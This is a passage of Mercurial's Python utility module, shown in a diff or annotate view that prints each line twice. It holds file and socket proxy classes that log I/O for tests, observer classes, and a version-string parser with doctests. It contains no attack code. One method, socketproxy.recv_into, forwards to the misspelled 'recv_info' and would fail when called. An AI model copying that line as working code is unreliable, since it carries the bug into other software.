576 return object.__getattribute__(self, r'_observedcall')(
576 return object.__getattribute__(self, r'_observedcall')(
577 r'close', *args, **kwargs)
577 r'close', *args, **kwargs)
578
578
579 def fileno(self, *args, **kwargs):
579 def fileno(self, *args, **kwargs):
580 return object.__getattribute__(self, r'_observedcall')(
580 return object.__getattribute__(self, r'_observedcall')(
581 r'fileno', *args, **kwargs)
581 r'fileno', *args, **kwargs)
582
582
583 def flush(self, *args, **kwargs):
583 def flush(self, *args, **kwargs):
584 return object.__getattribute__(self, r'_observedcall')(
584 return object.__getattribute__(self, r'_observedcall')(
585 r'flush', *args, **kwargs)
585 r'flush', *args, **kwargs)
586
586
587 def isatty(self, *args, **kwargs):
587 def isatty(self, *args, **kwargs):
588 return object.__getattribute__(self, r'_observedcall')(
588 return object.__getattribute__(self, r'_observedcall')(
589 r'isatty', *args, **kwargs)
589 r'isatty', *args, **kwargs)
590
590
591 def readable(self, *args, **kwargs):
591 def readable(self, *args, **kwargs):
592 return object.__getattribute__(self, r'_observedcall')(
592 return object.__getattribute__(self, r'_observedcall')(
593 r'readable', *args, **kwargs)
593 r'readable', *args, **kwargs)
594
594
595 def readline(self, *args, **kwargs):
595 def readline(self, *args, **kwargs):
596 return object.__getattribute__(self, r'_observedcall')(
596 return object.__getattribute__(self, r'_observedcall')(
597 r'readline', *args, **kwargs)
597 r'readline', *args, **kwargs)
598
598
599 def readlines(self, *args, **kwargs):
599 def readlines(self, *args, **kwargs):
600 return object.__getattribute__(self, r'_observedcall')(
600 return object.__getattribute__(self, r'_observedcall')(
601 r'readlines', *args, **kwargs)
601 r'readlines', *args, **kwargs)
602
602
603 def seek(self, *args, **kwargs):
603 def seek(self, *args, **kwargs):
604 return object.__getattribute__(self, r'_observedcall')(
604 return object.__getattribute__(self, r'_observedcall')(
605 r'seek', *args, **kwargs)
605 r'seek', *args, **kwargs)
606
606
607 def seekable(self, *args, **kwargs):
607 def seekable(self, *args, **kwargs):
608 return object.__getattribute__(self, r'_observedcall')(
608 return object.__getattribute__(self, r'_observedcall')(
609 r'seekable', *args, **kwargs)
609 r'seekable', *args, **kwargs)
610
610
611 def tell(self, *args, **kwargs):
611 def tell(self, *args, **kwargs):
612 return object.__getattribute__(self, r'_observedcall')(
612 return object.__getattribute__(self, r'_observedcall')(
613 r'tell', *args, **kwargs)
613 r'tell', *args, **kwargs)
614
614
615 def truncate(self, *args, **kwargs):
615 def truncate(self, *args, **kwargs):
616 return object.__getattribute__(self, r'_observedcall')(
616 return object.__getattribute__(self, r'_observedcall')(
617 r'truncate', *args, **kwargs)
617 r'truncate', *args, **kwargs)
618
618
619 def writable(self, *args, **kwargs):
619 def writable(self, *args, **kwargs):
620 return object.__getattribute__(self, r'_observedcall')(
620 return object.__getattribute__(self, r'_observedcall')(
621 r'writable', *args, **kwargs)
621 r'writable', *args, **kwargs)
622
622
623 def writelines(self, *args, **kwargs):
623 def writelines(self, *args, **kwargs):
624 return object.__getattribute__(self, r'_observedcall')(
624 return object.__getattribute__(self, r'_observedcall')(
625 r'writelines', *args, **kwargs)
625 r'writelines', *args, **kwargs)
626
626
627 def read(self, *args, **kwargs):
627 def read(self, *args, **kwargs):
628 return object.__getattribute__(self, r'_observedcall')(
628 return object.__getattribute__(self, r'_observedcall')(
629 r'read', *args, **kwargs)
629 r'read', *args, **kwargs)
630
630
631 def readall(self, *args, **kwargs):
631 def readall(self, *args, **kwargs):
632 return object.__getattribute__(self, r'_observedcall')(
632 return object.__getattribute__(self, r'_observedcall')(
633 r'readall', *args, **kwargs)
633 r'readall', *args, **kwargs)
634
634
635 def readinto(self, *args, **kwargs):
635 def readinto(self, *args, **kwargs):
636 return object.__getattribute__(self, r'_observedcall')(
636 return object.__getattribute__(self, r'_observedcall')(
637 r'readinto', *args, **kwargs)
637 r'readinto', *args, **kwargs)
638
638
639 def write(self, *args, **kwargs):
639 def write(self, *args, **kwargs):
640 return object.__getattribute__(self, r'_observedcall')(
640 return object.__getattribute__(self, r'_observedcall')(
641 r'write', *args, **kwargs)
641 r'write', *args, **kwargs)
642
642
643 def detach(self, *args, **kwargs):
643 def detach(self, *args, **kwargs):
644 return object.__getattribute__(self, r'_observedcall')(
644 return object.__getattribute__(self, r'_observedcall')(
645 r'detach', *args, **kwargs)
645 r'detach', *args, **kwargs)
646
646
647 def read1(self, *args, **kwargs):
647 def read1(self, *args, **kwargs):
648 return object.__getattribute__(self, r'_observedcall')(
648 return object.__getattribute__(self, r'_observedcall')(
649 r'read1', *args, **kwargs)
649 r'read1', *args, **kwargs)
650
650
651 class observedbufferedinputpipe(bufferedinputpipe):
651 class observedbufferedinputpipe(bufferedinputpipe):
652 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
652 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
653
653
654 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
654 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
655 bypass ``fileobjectproxy``. Because of this, we need to make
655 bypass ``fileobjectproxy``. Because of this, we need to make
656 ``bufferedinputpipe`` aware of these operations.
656 ``bufferedinputpipe`` aware of these operations.
657
657
658 This variation of ``bufferedinputpipe`` can notify observers about
658 This variation of ``bufferedinputpipe`` can notify observers about
659 ``os.read()`` events. It also re-publishes other events, such as
659 ``os.read()`` events. It also re-publishes other events, such as
660 ``read()`` and ``readline()``.
660 ``read()`` and ``readline()``.
661 """
661 """
662 def _fillbuffer(self):
662 def _fillbuffer(self):
663 res = super(observedbufferedinputpipe, self)._fillbuffer()
663 res = super(observedbufferedinputpipe, self)._fillbuffer()
664
664
665 fn = getattr(self._input._observer, r'osread', None)
665 fn = getattr(self._input._observer, r'osread', None)
666 if fn:
666 if fn:
667 fn(res, _chunksize)
667 fn(res, _chunksize)
668
668
669 return res
669 return res
670
670
671 # We use different observer methods because the operation isn't
671 # We use different observer methods because the operation isn't
672 # performed on the actual file object but on us.
672 # performed on the actual file object but on us.
673 def read(self, size):
673 def read(self, size):
674 res = super(observedbufferedinputpipe, self).read(size)
674 res = super(observedbufferedinputpipe, self).read(size)
675
675
676 fn = getattr(self._input._observer, r'bufferedread', None)
676 fn = getattr(self._input._observer, r'bufferedread', None)
677 if fn:
677 if fn:
678 fn(res, size)
678 fn(res, size)
679
679
680 return res
680 return res
681
681
682 def readline(self, *args, **kwargs):
682 def readline(self, *args, **kwargs):
683 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
683 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
684
684
685 fn = getattr(self._input._observer, r'bufferedreadline', None)
685 fn = getattr(self._input._observer, r'bufferedreadline', None)
686 if fn:
686 if fn:
687 fn(res)
687 fn(res)
688
688
689 return res
689 return res
690
690
691 PROXIED_SOCKET_METHODS = {
691 PROXIED_SOCKET_METHODS = {
692 r'makefile',
692 r'makefile',
693 r'recv',
693 r'recv',
694 r'recvfrom',
694 r'recvfrom',
695 r'recvfrom_into',
695 r'recvfrom_into',
696 r'recv_into',
696 r'recv_into',
697 r'send',
697 r'send',
698 r'sendall',
698 r'sendall',
699 r'sendto',
699 r'sendto',
700 r'setblocking',
700 r'setblocking',
701 r'settimeout',
701 r'settimeout',
702 r'gettimeout',
702 r'gettimeout',
703 r'setsockopt',
703 r'setsockopt',
704 }
704 }
705
705
706 class socketproxy(object):
706 class socketproxy(object):
707 """A proxy around a socket that tells a watcher when events occur.
707 """A proxy around a socket that tells a watcher when events occur.
708
708
709 This is like ``fileobjectproxy`` except for sockets.
709 This is like ``fileobjectproxy`` except for sockets.
710
710
711 This type is intended to only be used for testing purposes. Think hard
711 This type is intended to only be used for testing purposes. Think hard
712 before using it in important code.
712 before using it in important code.
713 """
713 """
714 __slots__ = (
714 __slots__ = (
715 r'_orig',
715 r'_orig',
716 r'_observer',
716 r'_observer',
717 )
717 )
718
718
719 def __init__(self, sock, observer):
719 def __init__(self, sock, observer):
720 object.__setattr__(self, r'_orig', sock)
720 object.__setattr__(self, r'_orig', sock)
721 object.__setattr__(self, r'_observer', observer)
721 object.__setattr__(self, r'_observer', observer)
722
722
723 def __getattribute__(self, name):
723 def __getattribute__(self, name):
724 if name in PROXIED_SOCKET_METHODS:
724 if name in PROXIED_SOCKET_METHODS:
725 return object.__getattribute__(self, name)
725 return object.__getattribute__(self, name)
726
726
727 return getattr(object.__getattribute__(self, r'_orig'), name)
727 return getattr(object.__getattribute__(self, r'_orig'), name)
728
728
729 def __delattr__(self, name):
729 def __delattr__(self, name):
730 return delattr(object.__getattribute__(self, r'_orig'), name)
730 return delattr(object.__getattribute__(self, r'_orig'), name)
731
731
732 def __setattr__(self, name, value):
732 def __setattr__(self, name, value):
733 return setattr(object.__getattribute__(self, r'_orig'), name, value)
733 return setattr(object.__getattribute__(self, r'_orig'), name, value)
734
734
735 def __nonzero__(self):
735 def __nonzero__(self):
736 return bool(object.__getattribute__(self, r'_orig'))
736 return bool(object.__getattribute__(self, r'_orig'))
737
737
738 __bool__ = __nonzero__
738 __bool__ = __nonzero__
739
739
740 def _observedcall(self, name, *args, **kwargs):
740 def _observedcall(self, name, *args, **kwargs):
741 # Call the original object.
741 # Call the original object.
742 orig = object.__getattribute__(self, r'_orig')
742 orig = object.__getattribute__(self, r'_orig')
743 res = getattr(orig, name)(*args, **kwargs)
743 res = getattr(orig, name)(*args, **kwargs)
744
744
745 # Call a method on the observer of the same name with arguments
745 # Call a method on the observer of the same name with arguments
746 # so it can react, log, etc.
746 # so it can react, log, etc.
747 observer = object.__getattribute__(self, r'_observer')
747 observer = object.__getattribute__(self, r'_observer')
748 fn = getattr(observer, name, None)
748 fn = getattr(observer, name, None)
749 if fn:
749 if fn:
750 fn(res, *args, **kwargs)
750 fn(res, *args, **kwargs)
751
751
752 return res
752 return res
753
753
754 def makefile(self, *args, **kwargs):
754 def makefile(self, *args, **kwargs):
755 res = object.__getattribute__(self, r'_observedcall')(
755 res = object.__getattribute__(self, r'_observedcall')(
756 r'makefile', *args, **kwargs)
756 r'makefile', *args, **kwargs)
757
757
758 # The file object may be used for I/O. So we turn it into a
758 # The file object may be used for I/O. So we turn it into a
759 # proxy using our observer.
759 # proxy using our observer.
760 observer = object.__getattribute__(self, r'_observer')
760 observer = object.__getattribute__(self, r'_observer')
761 return makeloggingfileobject(observer.fh, res, observer.name,
761 return makeloggingfileobject(observer.fh, res, observer.name,
762 reads=observer.reads,
762 reads=observer.reads,
763 writes=observer.writes,
763 writes=observer.writes,
764 logdata=observer.logdata,
764 logdata=observer.logdata,
765 logdataapis=observer.logdataapis)
765 logdataapis=observer.logdataapis)
766
766
767 def recv(self, *args, **kwargs):
767 def recv(self, *args, **kwargs):
768 return object.__getattribute__(self, r'_observedcall')(
768 return object.__getattribute__(self, r'_observedcall')(
769 r'recv', *args, **kwargs)
769 r'recv', *args, **kwargs)
770
770
771 def recvfrom(self, *args, **kwargs):
771 def recvfrom(self, *args, **kwargs):
772 return object.__getattribute__(self, r'_observedcall')(
772 return object.__getattribute__(self, r'_observedcall')(
773 r'recvfrom', *args, **kwargs)
773 r'recvfrom', *args, **kwargs)
774
774
775 def recvfrom_into(self, *args, **kwargs):
775 def recvfrom_into(self, *args, **kwargs):
776 return object.__getattribute__(self, r'_observedcall')(
776 return object.__getattribute__(self, r'_observedcall')(
777 r'recvfrom_into', *args, **kwargs)
777 r'recvfrom_into', *args, **kwargs)
778
778
779 def recv_into(self, *args, **kwargs):
779 def recv_into(self, *args, **kwargs):
780 return object.__getattribute__(self, r'_observedcall')(
780 return object.__getattribute__(self, r'_observedcall')(
781 r'recv_info', *args, **kwargs)
781 r'recv_info', *args, **kwargs)
782
782
783 def send(self, *args, **kwargs):
783 def send(self, *args, **kwargs):
784 return object.__getattribute__(self, r'_observedcall')(
784 return object.__getattribute__(self, r'_observedcall')(
785 r'send', *args, **kwargs)
785 r'send', *args, **kwargs)
786
786
787 def sendall(self, *args, **kwargs):
787 def sendall(self, *args, **kwargs):
788 return object.__getattribute__(self, r'_observedcall')(
788 return object.__getattribute__(self, r'_observedcall')(
789 r'sendall', *args, **kwargs)
789 r'sendall', *args, **kwargs)
790
790
791 def sendto(self, *args, **kwargs):
791 def sendto(self, *args, **kwargs):
792 return object.__getattribute__(self, r'_observedcall')(
792 return object.__getattribute__(self, r'_observedcall')(
793 r'sendto', *args, **kwargs)
793 r'sendto', *args, **kwargs)
794
794
795 def setblocking(self, *args, **kwargs):
795 def setblocking(self, *args, **kwargs):
796 return object.__getattribute__(self, r'_observedcall')(
796 return object.__getattribute__(self, r'_observedcall')(
797 r'setblocking', *args, **kwargs)
797 r'setblocking', *args, **kwargs)
798
798
799 def settimeout(self, *args, **kwargs):
799 def settimeout(self, *args, **kwargs):
800 return object.__getattribute__(self, r'_observedcall')(
800 return object.__getattribute__(self, r'_observedcall')(
801 r'settimeout', *args, **kwargs)
801 r'settimeout', *args, **kwargs)
802
802
803 def gettimeout(self, *args, **kwargs):
803 def gettimeout(self, *args, **kwargs):
804 return object.__getattribute__(self, r'_observedcall')(
804 return object.__getattribute__(self, r'_observedcall')(
805 r'gettimeout', *args, **kwargs)
805 r'gettimeout', *args, **kwargs)
806
806
807 def setsockopt(self, *args, **kwargs):
807 def setsockopt(self, *args, **kwargs):
808 return object.__getattribute__(self, r'_observedcall')(
808 return object.__getattribute__(self, r'_observedcall')(
809 r'setsockopt', *args, **kwargs)
809 r'setsockopt', *args, **kwargs)
810
810
811 class baseproxyobserver(object):
811 class baseproxyobserver(object):
812 def _writedata(self, data):
812 def _writedata(self, data):
813 if not self.logdata:
813 if not self.logdata:
814 if self.logdataapis:
814 if self.logdataapis:
815 self.fh.write('\n')
815 self.fh.write('\n')
816 self.fh.flush()
816 self.fh.flush()
817 return
817 return
818
818
819 # Simple case writes all data on a single line.
819 # Simple case writes all data on a single line.
820 if b'\n' not in data:
820 if b'\n' not in data:
821 if self.logdataapis:
821 if self.logdataapis:
822 self.fh.write(': %s\n' % stringutil.escapedata(data))
822 self.fh.write(': %s\n' % stringutil.escapedata(data))
823 else:
823 else:
824 self.fh.write('%s> %s\n'
824 self.fh.write('%s> %s\n'
825 % (self.name, stringutil.escapedata(data)))
825 % (self.name, stringutil.escapedata(data)))
826 self.fh.flush()
826 self.fh.flush()
827 return
827 return
828
828
829 # Data with newlines is written to multiple lines.
829 # Data with newlines is written to multiple lines.
830 if self.logdataapis:
830 if self.logdataapis:
831 self.fh.write(':\n')
831 self.fh.write(':\n')
832
832
833 lines = data.splitlines(True)
833 lines = data.splitlines(True)
834 for line in lines:
834 for line in lines:
835 self.fh.write('%s> %s\n'
835 self.fh.write('%s> %s\n'
836 % (self.name, stringutil.escapedata(line)))
836 % (self.name, stringutil.escapedata(line)))
837 self.fh.flush()
837 self.fh.flush()
838
838
839 class fileobjectobserver(baseproxyobserver):
839 class fileobjectobserver(baseproxyobserver):
840 """Logs file object activity."""
840 """Logs file object activity."""
841 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
841 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
842 logdataapis=True):
842 logdataapis=True):
843 self.fh = fh
843 self.fh = fh
844 self.name = name
844 self.name = name
845 self.logdata = logdata
845 self.logdata = logdata
846 self.logdataapis = logdataapis
846 self.logdataapis = logdataapis
847 self.reads = reads
847 self.reads = reads
848 self.writes = writes
848 self.writes = writes
849
849
850 def read(self, res, size=-1):
850 def read(self, res, size=-1):
851 if not self.reads:
851 if not self.reads:
852 return
852 return
853 # Python 3 can return None from reads at EOF instead of empty strings.
853 # Python 3 can return None from reads at EOF instead of empty strings.
854 if res is None:
854 if res is None:
855 res = ''
855 res = ''
856
856
857 if self.logdataapis:
857 if self.logdataapis:
858 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
858 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
859
859
860 self._writedata(res)
860 self._writedata(res)
861
861
862 def readline(self, res, limit=-1):
862 def readline(self, res, limit=-1):
863 if not self.reads:
863 if not self.reads:
864 return
864 return
865
865
866 if self.logdataapis:
866 if self.logdataapis:
867 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
867 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
868
868
869 self._writedata(res)
869 self._writedata(res)
870
870
871 def readinto(self, res, dest):
871 def readinto(self, res, dest):
872 if not self.reads:
872 if not self.reads:
873 return
873 return
874
874
875 if self.logdataapis:
875 if self.logdataapis:
876 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
876 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
877 res))
877 res))
878
878
879 data = dest[0:res] if res is not None else b''
879 data = dest[0:res] if res is not None else b''
880 self._writedata(data)
880 self._writedata(data)
881
881
882 def write(self, res, data):
882 def write(self, res, data):
883 if not self.writes:
883 if not self.writes:
884 return
884 return
885
885
886 # Python 2 returns None from some write() calls. Python 3 (reasonably)
886 # Python 2 returns None from some write() calls. Python 3 (reasonably)
887 # returns the integer bytes written.
887 # returns the integer bytes written.
888 if res is None and data:
888 if res is None and data:
889 res = len(data)
889 res = len(data)
890
890
891 if self.logdataapis:
891 if self.logdataapis:
892 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
892 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
893
893
894 self._writedata(data)
894 self._writedata(data)
895
895
896 def flush(self, res):
896 def flush(self, res):
897 if not self.writes:
897 if not self.writes:
898 return
898 return
899
899
900 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
900 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
901
901
902 # For observedbufferedinputpipe.
902 # For observedbufferedinputpipe.
903 def bufferedread(self, res, size):
903 def bufferedread(self, res, size):
904 if not self.reads:
904 if not self.reads:
905 return
905 return
906
906
907 if self.logdataapis:
907 if self.logdataapis:
908 self.fh.write('%s> bufferedread(%d) -> %d' % (
908 self.fh.write('%s> bufferedread(%d) -> %d' % (
909 self.name, size, len(res)))
909 self.name, size, len(res)))
910
910
911 self._writedata(res)
911 self._writedata(res)
912
912
913 def bufferedreadline(self, res):
913 def bufferedreadline(self, res):
914 if not self.reads:
914 if not self.reads:
915 return
915 return
916
916
917 if self.logdataapis:
917 if self.logdataapis:
918 self.fh.write('%s> bufferedreadline() -> %d' % (
918 self.fh.write('%s> bufferedreadline() -> %d' % (
919 self.name, len(res)))
919 self.name, len(res)))
920
920
921 self._writedata(res)
921 self._writedata(res)
922
922
923 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
923 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
924 logdata=False, logdataapis=True):
924 logdata=False, logdataapis=True):
925 """Turn a file object into a logging file object."""
925 """Turn a file object into a logging file object."""
926
926
927 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
927 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
928 logdata=logdata, logdataapis=logdataapis)
928 logdata=logdata, logdataapis=logdataapis)
929 return fileobjectproxy(fh, observer)
929 return fileobjectproxy(fh, observer)
930
930
931 class socketobserver(baseproxyobserver):
931 class socketobserver(baseproxyobserver):
932 """Logs socket activity."""
932 """Logs socket activity."""
933 def __init__(self, fh, name, reads=True, writes=True, states=True,
933 def __init__(self, fh, name, reads=True, writes=True, states=True,
934 logdata=False, logdataapis=True):
934 logdata=False, logdataapis=True):
935 self.fh = fh
935 self.fh = fh
936 self.name = name
936 self.name = name
937 self.reads = reads
937 self.reads = reads
938 self.writes = writes
938 self.writes = writes
939 self.states = states
939 self.states = states
940 self.logdata = logdata
940 self.logdata = logdata
941 self.logdataapis = logdataapis
941 self.logdataapis = logdataapis
942
942
943 def makefile(self, res, mode=None, bufsize=None):
943 def makefile(self, res, mode=None, bufsize=None):
944 if not self.states:
944 if not self.states:
945 return
945 return
946
946
947 self.fh.write('%s> makefile(%r, %r)\n' % (
947 self.fh.write('%s> makefile(%r, %r)\n' % (
948 self.name, mode, bufsize))
948 self.name, mode, bufsize))
949
949
950 def recv(self, res, size, flags=0):
950 def recv(self, res, size, flags=0):
951 if not self.reads:
951 if not self.reads:
952 return
952 return
953
953
954 if self.logdataapis:
954 if self.logdataapis:
955 self.fh.write('%s> recv(%d, %d) -> %d' % (
955 self.fh.write('%s> recv(%d, %d) -> %d' % (
956 self.name, size, flags, len(res)))
956 self.name, size, flags, len(res)))
957 self._writedata(res)
957 self._writedata(res)
958
958
959 def recvfrom(self, res, size, flags=0):
959 def recvfrom(self, res, size, flags=0):
960 if not self.reads:
960 if not self.reads:
961 return
961 return
962
962
963 if self.logdataapis:
963 if self.logdataapis:
964 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
964 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
965 self.name, size, flags, len(res[0])))
965 self.name, size, flags, len(res[0])))
966
966
967 self._writedata(res[0])
967 self._writedata(res[0])
968
968
969 def recvfrom_into(self, res, buf, size, flags=0):
969 def recvfrom_into(self, res, buf, size, flags=0):
970 if not self.reads:
970 if not self.reads:
971 return
971 return
972
972
973 if self.logdataapis:
973 if self.logdataapis:
974 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
974 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
975 self.name, size, flags, res[0]))
975 self.name, size, flags, res[0]))
976
976
977 self._writedata(buf[0:res[0]])
977 self._writedata(buf[0:res[0]])
978
978
979 def recv_into(self, res, buf, size=0, flags=0):
979 def recv_into(self, res, buf, size=0, flags=0):
980 if not self.reads:
980 if not self.reads:
981 return
981 return
982
982
983 if self.logdataapis:
983 if self.logdataapis:
984 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
984 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
985 self.name, size, flags, res))
985 self.name, size, flags, res))
986
986
987 self._writedata(buf[0:res])
987 self._writedata(buf[0:res])
988
988
989 def send(self, res, data, flags=0):
989 def send(self, res, data, flags=0):
990 if not self.writes:
990 if not self.writes:
991 return
991 return
992
992
993 self.fh.write('%s> send(%d, %d) -> %d' % (
993 self.fh.write('%s> send(%d, %d) -> %d' % (
994 self.name, len(data), flags, len(res)))
994 self.name, len(data), flags, len(res)))
995 self._writedata(data)
995 self._writedata(data)
996
996
997 def sendall(self, res, data, flags=0):
997 def sendall(self, res, data, flags=0):
998 if not self.writes:
998 if not self.writes:
999 return
999 return
1000
1000
1001 if self.logdataapis:
1001 if self.logdataapis:
1002 # Returns None on success. So don't bother reporting return value.
1002 # Returns None on success. So don't bother reporting return value.
1003 self.fh.write('%s> sendall(%d, %d)' % (
1003 self.fh.write('%s> sendall(%d, %d)' % (
1004 self.name, len(data), flags))
1004 self.name, len(data), flags))
1005
1005
1006 self._writedata(data)
1006 self._writedata(data)
1007
1007
1008 def sendto(self, res, data, flagsoraddress, address=None):
1008 def sendto(self, res, data, flagsoraddress, address=None):
1009 if not self.writes:
1009 if not self.writes:
1010 return
1010 return
1011
1011
1012 if address:
1012 if address:
1013 flags = flagsoraddress
1013 flags = flagsoraddress
1014 else:
1014 else:
1015 flags = 0
1015 flags = 0
1016
1016
1017 if self.logdataapis:
1017 if self.logdataapis:
1018 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1018 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1019 self.name, len(data), flags, address, res))
1019 self.name, len(data), flags, address, res))
1020
1020
1021 self._writedata(data)
1021 self._writedata(data)
1022
1022
1023 def setblocking(self, res, flag):
1023 def setblocking(self, res, flag):
1024 if not self.states:
1024 if not self.states:
1025 return
1025 return
1026
1026
1027 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1027 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1028
1028
1029 def settimeout(self, res, value):
1029 def settimeout(self, res, value):
1030 if not self.states:
1030 if not self.states:
1031 return
1031 return
1032
1032
1033 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1033 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1034
1034
1035 def gettimeout(self, res):
1035 def gettimeout(self, res):
1036 if not self.states:
1036 if not self.states:
1037 return
1037 return
1038
1038
1039 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1039 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1040
1040
1041 def setsockopt(self, level, optname, value):
1041 def setsockopt(self, level, optname, value):
1042 if not self.states:
1042 if not self.states:
1043 return
1043 return
1044
1044
1045 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1045 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1046 self.name, level, optname, value))
1046 self.name, level, optname, value))
1047
1047
1048 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1048 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1049 logdata=False, logdataapis=True):
1049 logdata=False, logdataapis=True):
1050 """Turn a socket into a logging socket."""
1050 """Turn a socket into a logging socket."""
1051
1051
1052 observer = socketobserver(logh, name, reads=reads, writes=writes,
1052 observer = socketobserver(logh, name, reads=reads, writes=writes,
1053 states=states, logdata=logdata,
1053 states=states, logdata=logdata,
1054 logdataapis=logdataapis)
1054 logdataapis=logdataapis)
1055 return socketproxy(fh, observer)
1055 return socketproxy(fh, observer)
1056
1056
1057 def version():
1057 def version():
1058 """Return version information if available."""
1058 """Return version information if available."""
1059 try:
1059 try:
1060 from . import __version__
1060 from . import __version__
1061 return __version__.version
1061 return __version__.version
1062 except ImportError:
1062 except ImportError:
1063 return 'unknown'
1063 return 'unknown'
1064
1064
1065 def versiontuple(v=None, n=4):
1065 def versiontuple(v=None, n=4):
1066 """Parses a Mercurial version string into an N-tuple.
1066 """Parses a Mercurial version string into an N-tuple.
1067
1067
1068 The version string to be parsed is specified with the ``v`` argument.
1068 The version string to be parsed is specified with the ``v`` argument.
1069 If it isn't defined, the current Mercurial version string will be parsed.
1069 If it isn't defined, the current Mercurial version string will be parsed.
1070
1070
1071 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1071 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1072 returned values:
1072 returned values:
1073
1073
1074 >>> v = b'3.6.1+190-df9b73d2d444'
1074 >>> v = b'3.6.1+190-df9b73d2d444'
1075 >>> versiontuple(v, 2)
1075 >>> versiontuple(v, 2)
1076 (3, 6)
1076 (3, 6)
1077 >>> versiontuple(v, 3)
1077 >>> versiontuple(v, 3)
1078 (3, 6, 1)
1078 (3, 6, 1)
1079 >>> versiontuple(v, 4)
1079 >>> versiontuple(v, 4)
1080 (3, 6, 1, '190-df9b73d2d444')
1080 (3, 6, 1, '190-df9b73d2d444')
1081
1081
1082 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1082 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1083 (3, 6, 1, '190-df9b73d2d444+20151118')
1083 (3, 6, 1, '190-df9b73d2d444+20151118')
1084
1084
1085 >>> v = b'3.6'
1085 >>> v = b'3.6'
1086 >>> versiontuple(v, 2)
1086 >>> versiontuple(v, 2)
1087 (3, 6)
1087 (3, 6)
1088 >>> versiontuple(v, 3)
1088 >>> versiontuple(v, 3)
1089 (3, 6, None)
1089 (3, 6, None)
1090 >>> versiontuple(v, 4)
1090 >>> versiontuple(v, 4)
1091 (3, 6, None, None)
1091 (3, 6, None, None)
1092
1092
1093 >>> v = b'3.9-rc'
1093 >>> v = b'3.9-rc'
1094 >>> versiontuple(v, 2)
1094 >>> versiontuple(v, 2)
1095 (3, 9)
1095 (3, 9)
1096 >>> versiontuple(v, 3)
1096 >>> versiontuple(v, 3)
1097 (3, 9, None)
1097 (3, 9, None)
1098 >>> versiontuple(v, 4)
1098 >>> versiontuple(v, 4)
1099 (3, 9, None, 'rc')
1099 (3, 9, None, 'rc')
1100
1100
1101 >>> v = b'3.9-rc+2-02a8fea4289b'
1101 >>> v = b'3.9-rc+2-02a8fea4289b'
1102 >>> versiontuple(v, 2)
1102 >>> versiontuple(v, 2)
1103 (3, 9)
1103 (3, 9)
1104 >>> versiontuple(v, 3)
1104 >>> versiontuple(v, 3)
1105 (3, 9, None)
1105 (3, 9, None)
1106 >>> versiontuple(v, 4)
1106 >>> versiontuple(v, 4)
1107 (3, 9, None, 'rc+2-02a8fea4289b')
1107 (3, 9, None, 'rc+2-02a8fea4289b')
1108 """
1108 """
1109 if not v:
1109 if not v:
1110 v = version()
1110 v = version()
1111 parts = remod.split('[\+-]', v, 1)
1111 parts = remod.split('[\+-]', v, 1)
1112 if len(parts) == 1:
1112 if len(parts) == 1:
1113 vparts, extra = parts[0], None
1113 vparts, extra = parts[0], None
1114 else:
1114 else:
1115 vparts, extra = parts
1115 vparts, extra = parts
1116
1116
1117 vints = []
1117 vints = []
1118 for i in vparts.split('.'):
1118 for i in vparts.split('.'):
1119 try:
1119 try:
1120 vints.append(int(i))
1120 vints.append(int(i))
1121 except ValueError:
1121 except ValueError:
1122 break
1122 break
1123 # (3, 6) -> (3, 6, None)
1123 # (3, 6) -> (3, 6, None)
1124 while len(vints) < 3:
1124 while len(vints) < 3:
1125 vints.append(None)
1125 vints.append(None)
1126
1126
1127 if n == 2:
1127 if n == 2:
1128 return (vints[0], vints[1])
1128 return (vints[0], vints[1])
1129 if n == 3:
1129 if n == 3:
1130 return (vints[0], vints[1], vints[2])
1130 return (vints[0], vints[1], vints[2])
1131 if n == 4:
1131 if n == 4:
1132 return (vints[0], vints[1], vints[2], extra)
1132 return (vints[0], vints[1], vints[2], extra)
1133
1133
1134 def cachefunc(func):
1134 def cachefunc(func):
1135 '''cache the result of function calls'''
1135 '''cache the result of function calls'''
1136 # XXX doesn't handle keywords args
1136 # XXX doesn't handle keywords args
1137 if func.__code__.co_argcount == 0:
1137 if func.__code__.co_argcount == 0:
1138 cache = []
1138 cache = []
1139 def f():
